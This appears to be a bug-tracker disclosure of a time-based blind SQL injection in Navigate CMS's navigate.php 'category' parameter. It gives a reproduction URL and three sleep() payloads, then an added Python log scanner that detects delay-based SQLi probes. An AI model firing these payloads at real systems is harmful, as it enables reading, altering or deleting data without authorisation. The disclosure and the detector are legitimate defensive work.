Expected behaviour
Blind SQL injection (SQLi) refers to an injection attack in which an attacker can execute malicious SQL statements and use the application's responses to collect information; here the injection point is the URL-encoded GET input category.
Impact
Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database.
- Executing commands on the underlying operating system.
Steps to reproduce
Inject the payload into the category parameter via this request: http://10.14.140.69:8012/navigate/navigate/navigate.php?_bogus=1592542677572&act=items_order&category==(select(0)from(select(sleep(0)))v)/*%27%2B(select(0)from(select(sleep(0)))v)%2B%27%22%2B(select(0)from(select(sleep(0)))v)%2B%22*/&fid=items
Payload: (select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/
Payload: (select(0)from(select(sleep(10)))v)/'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"/
Payload: (select(0)from(select(sleep(20)))v)/'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"/
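As an added example (not code from the report or from the project), a small Python log check that URL-decodes each request's query string and flags the time-delay primitives used in probes like the ones above; the log lines are constructed, with the second reproducing the request from the report. A sleep(0) probe produces no measurable delay, so it is visible only in request content, never in response timing.

```python
"""Detect time-based blind SQLi probes in web access logs (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Time-delay primitives used for blind SQLi against common engines
# (MySQL sleep/benchmark, PostgreSQL pg_sleep, MSSQL WAITFOR DELAY).
DELAY_RE = re.compile(
    r"(?i)\b(sleep|pg_sleep|benchmark)\s*\(\s*(\d*)|\b(waitfor)\s+delay\b")


def find_delay_probes(url):
    """Return one finding per delay primitive in any query parameter.

    parse_qsl undoes %-encoding (%27 -> ', %2B -> +), so matching runs on
    the text the database would actually receive, not on the raw URL."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for m in DELAY_RE.finditer(value):
            primitive = (m.group(1) or m.group(3)).lower()
            seconds = int(m.group(2)) if m.group(2) else None
            findings.append({"param": name, "primitive": primitive,
                             "seconds": seconds})
    return findings


def scan_access_log(lines):
    """Return (line_number, request_path, findings) for each suspicious
    line. Expects Apache/nginx-style '"GET <path> HTTP/1.1"' requests."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and (findings := find_delay_probes(m.group(1))):
            hits.append((lineno, m.group(1), findings))
    return hits


# Constructed sample log. REPORT_PATH is the request path from the issue;
# the third line is its sleep(10) variant (second payload in the report).
REPORT_PATH = ("/navigate/navigate/navigate.php?_bogus=1592542677572"
               "&act=items_order&category==(select(0)from(select(sleep(0)))v)"
               "/*%27%2B(select(0)from(select(sleep(0)))v)%2B%27%22%2B"
               "(select(0)from(select(sleep(0)))v)%2B%22*/&fid=items")
LOG_FMT = '10.0.0.9 - - [19/Jun/2020:04:57:57 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [
    LOG_FMT.format("/navigate/navigate/navigate.php?act=items_order&category=3&fid=items"),
    LOG_FMT.format(REPORT_PATH),
    LOG_FMT.format(REPORT_PATH.replace("sleep(0)", "sleep(10)")),
]

if __name__ == "__main__":
    for lineno, path, findings in scan_access_log(SAMPLE_LOG):
        print(lineno, [(f["param"], f["primitive"], f["seconds"]) for f in findings])
```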